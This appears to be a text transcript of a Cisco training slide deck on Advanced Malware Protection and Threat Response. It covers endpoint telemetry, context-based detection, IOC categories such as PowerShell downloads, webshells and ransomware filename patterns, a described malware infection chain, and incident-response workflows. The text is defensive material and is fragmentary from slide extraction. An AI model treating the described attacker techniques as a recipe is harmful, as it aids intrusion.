Cisco Advanced Malware Protection · directly on the client ... [Application] Compromise - A...

Cisco Threat Response (CTR) (formerly known as Visibility)

Cisco Advanced Malware Protection

© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Company

ProductsMalware

Mindset

Strategy

Knowledge

Behavior

Complexity

Features

Detection Engines

Coverage

The history of Endpoint Protection

Probability

Detection?

Remediation?

Proactive?

Winner

Who wins the Race?

Hopefully you!

Processing

Company (Defender)

Products (Features)

Malware (Attacker)

Domain Names / IP Address

Hash Values

Network/Host Artifacts

TTPs / Tools

Levels

Tough!

Challenging

Annoying

Simple

Easy

Trivial


From Event to Context

• Context simplifies complexity

• Provides a complete different view to yourinsight threatlandscape

• Context aware is not a product, it is more a capability and approach

• Contextis RelationshipbetweenInformation andArtifacts

IP, URL, Domain

Flow Correlation

Behavior

Events

Context


From Event to Context – what can be includedEvent(s)

Event from variouspoint of products.

Context

Includes much information. Events are one part only.


Endpoint Challenges

Result20min. with Win 10

(Procmon)Threat Intelligence Counters by Talos

• To much data to handle OnPremise

• To much data to handle directly on the client

• Threat Landscape is to complex to be handled on the endpoint only

• Another approach necessary

• 46M OS operation events

• 8.7M File events

• 11.5K Process events

• 114K Network events

• 35M Registry events

• 1.5M unique Samples Daily

• 20B Threats blocked/day

• 150B DNS entries daily

• 18.5B AMP queries/day

• 16B URLs/Web requests daily

• Threat Data processed: 120TB/day, 3.6PB/month

4,9

96

,895

,529 u

niq

ue

hashes

pe

r w

ee

k


N + = X

Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

Event

Event Details

Engines / Technologies

Signatures Based

Advanced Techniques

Proactive Techniques

Machine Learning

Exploit Prevention

Memory Protection

Host based IPS

Advanced Analytics

When needed?

Configuration

Endpoint Configuration

Cloud and Intelligence

When querying cloud

or other intelligences

Start

Something comes up

at the endpoint.

1 of 46 Million

Endpoint Protection – Traditional Approach


Behavior Cluster

Malicious behaviour cluster including hundrets/thousands/million artifacts and also including one or more Threat Events

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

No Event

No Information

N + = X

Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

Event

Event Details


Timeline in one direction Timewindow from ms/sec. No information beyond Threat Events

Integrations

Intelligence, Product, SIEM


Engines / Technologies

Signatures Based

Advanced Techniques / Proactive Techniques

Machine Learning

Exploit Prevention

Memory Protection

Host based IPS

Cloud Information

Information for different types of artefacts

File Hashes

Certificate Information

Remediation infos

IP/URL Reputation

Management

Policies, Events

Logging

Reports

Updates/Upgrades

Timeline in one direction

Timewindow from ms/sec.

No information beyond Threat Events

Threatlandscape complexity

Ressource Intensive

Event Management

Event Rating

Visibility

EndpointProtection

Knowledge/Ressource/Design Gap

GOAL: Fix this gaps

Endpoint Protection – New Generation Strategy

Endpoint Connector Endpoint Backend

Endpoint Prevention

Advanced Techniques


Machine Learning

Exploit Prevention

Memory Protection

**Signature Based

Endpoint Protection Endpoint Mgmt.

Management

Events

Policies

Reporting

Threat Information Integration

Activity Storage

Endpoint Mgmt.Endpoint Monitoring

Disk Activity Monitoring

Network Monitoring

Device Flow Correlation

Endpoint IOC

Command Line Capture

Endpoint Monitoring Backend Intelligence

Intelligence

Idication of Compromise Calculation

Data Enrichment

Cloud Analysis Features

Backend Intelligence

Endpoint Protection – New Generation Strategy

Endpoint Connector Endpoint Backend

3rd Party

Integration (APIs)

Sharing (APIs)

Threat Feeds

Existing Infrastructure

Perimeter

Web and E-mail

Network Anomaly

Encrypted Traffic Analysis

NGFW/IPS

Agentless Detection

Weblog Analysis (CTA)

DNS BasedSecurity

Advanced Analytics

Static Analysis

Dynamic Analysis

Threat Intelligence Group

Research , Traps and Telemetry

Research and EfficacyTeam (RET)

Cisco Product Security Incident Response Team (PSIRT)

Endpoint Prevention

Advanced Techniques


Machine Learning

Exploit Prevention

Memory Protection

**Signature Based

Endpoint Protection

Communication Platform

Endpoint Mgmt.

Management

Events

Policies

Reporting

Threat Information Integration

Activity Storage

Endpoint Mgmt.Endpoint Monitoring

Disk Activity Monitoring

Network Monitoring

Device Flow Correlation

Endpoint IOC

Command Line Capture

Endpoint Monitoring Backend Intelligence

Intelligence

Idication of Compromise Calculation

Data Enrichment

Cloud Analysis Features

Backend Intelligence


3rd Party

Existing Security

Talos

ThreatIntelligence

CognitiveAnalytics

Network

AgentlessDetection

Anomaly

ETA

Start

Something comes up in the enterprise including managed and unmanaged devices

Endpoint Behavior

Collecting Artifacts, Behavior, Network Activity…….

Start

Something comes up

at the endpoint

Content

Web

E-mail

From Event to Context – Continous MonitoringChanging Time Window from ms/sec. to weeks

Time to both directions

Intelligence

Moving Ressource intensive Analysis from the endpoint to the cloud.

Endpoint Events

Disposition, Reaction, Action, Details


Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

3rd Party

Existing Security

Talos

ThreatIntelligence

CognitiveAnalytics

Network

AgentlessDetection

Anomaly

ETA

Start


Endpoint Behavior


Start

Something comes up

at the endpoint

Content

Web

E-mail

From Event to Context – Continous Monitoring

Endpoint Events

Disposition, Reaction, Action, Details

Continuous Monitoring 7x24x365

RETROSPECTION

VISIBILITY


3rd Party

Existing Security

Talos

ThreatIntelligence

CognitiveAnalytics

Network

AgentlessDetection

Anomaly

ETA

Start


Endpoint Behavior


Start

Something comes up

at the endpoint

Content

Web

E-mail


Endpoint Events

Disposition, Reaction, Action, Details Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

Continuous Monitoring 7x24x365

RETROSPECTION

VISIBILITY


Endpoint(s)

Endpoint Software

3rd Party

Existing Security

Talos

ThreatIntelligence

CognitiveAnalytics

Network

AgentlessDetection

Anomaly

ETA

Content

Web

E-mail


Information

Threat Feeds

Intelligences

Analytic Systems

Researcher

Indications of Compromise

Cloud Based

Local Calculated

Manual IOC File Upload


Event BasedTraditional Approach

Context basedAMP Visibilty Approach

From Event to Context – Summary


Disk Memory

Sophisticated Malware Example - Infection

Code Installation

Malware installedCode

Injection

Binary Data

Dynamic created Content

Loaded from 3rd party

Obfuscated Content

Encrypted Content

Looks like “waste”

Partial Download

HTTPS Traffic

Hidden Protocol in HTTPS

Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

Good?

Malicious?

Unknown? WORKING Hidden, Stealthy, time-delayed

DECOY User

PREVENT Detection

New Sample in the world

In Memory

Entrenchment

Code generated

Code

Injection

.HLP .MSI

New Attack vector

New vulnerabilities

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed


Disk Memory

Sophisticated Malware Example – Post Infection

Code Installation

Malware installedCode

Injection

Binary Data

Dynamic created Content

Loaded from 3rd party

Obfuscated Content

Encrypted Content

Looks like “waste”

Partial Download

HTTPS Traffic

Hidden Protocol in HTTPS

Category: Business

Reputation: good

IP-Reputation: good

Status: Compromised

Good?

Malicious?

Unknown? WORKING Hidden, Stealthy, time-delayed

DECOY User

PREVENT Detection

New Sample in the world

In Memory

Entrenchment

Code generated

Code

Injection

.HLP .MSI

New Attack vector

New vulnerabilities

.SVC

.DLL=

.ISO.OCX.EXEews.exe

Dropped Payload,

autom. executed,

generates new Files

.EXE

OInfoP11.exe

created

OInfo11.ocx

created, holds

Decryption Info

OInfo11.iso

extracted,

encrypted,

compressed

All unwanted

malicious behavior

Status: Clean

No Sample, no Signature

Infection Vector unknown

Time-to-detect infected host

Single File not malicious

C&C Communication

Data Loss

Which Artifacts are left for investigation?

Which Information is available for investigation?


Sample IOC Events:

Event list for Generic IOC.


IOC Event DetailExamples

Generic IOC: Powershell Download

Generic IOC: W32.PoweliksPersistence

Generic IOC: Possible Privilege Escalation Attempt Detected


AMP4E Calculating Indication of Compromise -1Calculation from observed Activity over the last 7 days Info

Threat Detected - One or more malware detections were triggered on the computer.

Potential Dropper Infection - Potential dropper infections indicate a single file is repeatedly attempting to download malware onto a computer.

Multiple Infected Files - Multiple infected files indicate multiple files on a computer are attempting to download malware.

Executed Malware - A known malware sample was executed on the computer. This can be more severe than a simple threat detectionbecause the malware potentially executed its payload.

Suspected botnet connection - The computer made outbound connections to a suspected botnet command and control system.

[Application] Compromise - A suspicious portable executable file was downloaded and executed by the application named, for exampleAdobe Reader Compromise.

[Application] launched a shell - The application named executed an unknown application, which in turn launched a command shell, forexample Java launched a shell.

Generic IOC - Suspicious behavior that indicates possible compromise of the computer.

Suspicious download - Attempted download of an executable file from a suspicious URL. This does not necessarily mean that the URL orthe file is malicious, or that the endpoint is definitely compromised. It indicates a need for further investigation into the context of thedownload and the downloading application to understand the exact nature of this operation.

AMP Cloud/Appliance Cloud Service Not available


AMP4E Calculating Indication of Compromise - 2Calculation from observed Activity over the last 7 days Info

Suspicious Cscript Launch - Internet Explorer launched a Command Prompt, which executed cscript.exe (Windows Script Host). This sequence of events is generally indicative of a browser sandbox escape ultimately resulting in execution of a malicious Visual Basic script.

Suspected ransomware - File names containing certain patterns associated with known ransomware were observed on the computer. Forexample, files named help_decrypt.<filename> were detected.

Possible webshell - the IIS Worker Process (w3wp) launched another process such as powershell.exe. This could indicate that thecomputer was compromised and remote access has been granted to the attacker.

Cognitive Threat - Cisco Cognitive Threat Analytics uses advanced algorithms, machine learning, and artificial intelligence to correlatenetwork traffic generated by your users and network devices to identify command-and-control traffic, data exfiltration, and maliciousapplications. A Cognitive Threat Indication of Compromise event is generated when suspicious or anomalous traffic is detected in yourorganization. Only threats that CTA has assigned a severity of 7 or higher are sent to AMP for Endpoints.

AMP Cloud/Appliance Cloud Service Not available


The power of connected intelligences

E.g. Co-OccurrenceModel

Cloud Based IOCsThreat CorrelationRetrospection

Log Lines > Anomaly Detection

-> 5-10% of Traffic left

Trust Modeling

-> Lon term prediction model

Events Classification

-> Naming for Events

Relationship Modeling ->

Aggregate with Endpoint Information

(Same Threat, Same Attacker)

Threat FeedsWordwide Sensors

Several automated withArtificial intelligenceSupported systems

TALOSAMP &

TG

CTAUmbrella

Common theme or

goal


Deliver

System back to user

Deliver to User

Format Device

Find

Where, who, howwhen….

Find the Malware

Disk Forensics

OnDemand ScanManual SearchKnowledge?

Full Disk Forensics

Availability

Client not availableUser on PTONo Sensordifferent Department

Availability

Ticketing

Defined Process?

Open Ticket

Verify

Verify the event e.g. if further analysis is necessary

Verify

Searching

Search in Siem or other available InformationSourse, Logfiles andso on.

Search in SIEM

Alert

Malware Alert from a single point of product

Malware Alert

Incident Response (IR) without Cisco Threat Response (CTR)

Timeline (Hours? Days? Weeks?)

Format

Most information lost


Q1 - Commodity/Targeted?Q2 - Persistency?Q3 - Ransom/Backups?Q4 - Lateral movement?Q5 - Clean/Format?

Steps

What next?

Next Steps

a.ExeHash: 92a6…………7a

Result

Result

Analysis Tools

Process Explorer

Wireshark

Full Disk Forensics

Other Tools

ToolsSearch on ClientSearch in SIEM

Q1 - DHCP info?Q2 - AD info?Q3 - CMDB info?Q4 - Vulnerability info?Q5 - AV info?Q6 - Who is doing the C&C?

Alert by Next-Gen Network• C&C Traffic Detected:• Destination : 52.28.249.128 Threat

Intelligence?• Source : 10.0.2.11 Q, Q, Q, Q, Q, Q, ?• Pcap Capture available?

C&C Traffic Alert

Timeline (Hours? Days? Weeks?)

IR without CTR – C&C traffic alert!!

Searching

Sources?Intelligences?Correlations?

Payload

OS

Hardware


Endpoint Protection Approach Dilemma

Threat Event?

Threat Event?

Threat Event?

Blind Spots for Investigations

Dependencies

Network Connections

Other relevant information for investigation


Chkdsk.exe

Network connection and drops/executes a malicious file.

Activity

Malicious File starts chkdsk.exe

Activity

Create, execute and network connection

IOC?

Application X generated and executed an unknown application Y….

PDFcreated

Execution

Application X was executed by application Y

IOC Vulnerability

Application with vulnerability

IR with CTR – Example

Network

Established networkconnections


Unknown PE

Application “unknown” was executed by a.exe.

IR with CTR – Response (Retrospection)

© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential

Let´s start

• LAB 1: Info from C-Level….

• LAB 2: User got fished….

• LAB 3: So many events…..

• LAB 4: Use your skills….

Cisco Advanced Malware Protection · directly on the client ... [Application] Compromise - A...

Documents

Transcript of Cisco Advanced Malware Protection · directly on the client ... [Application] Compromise - A...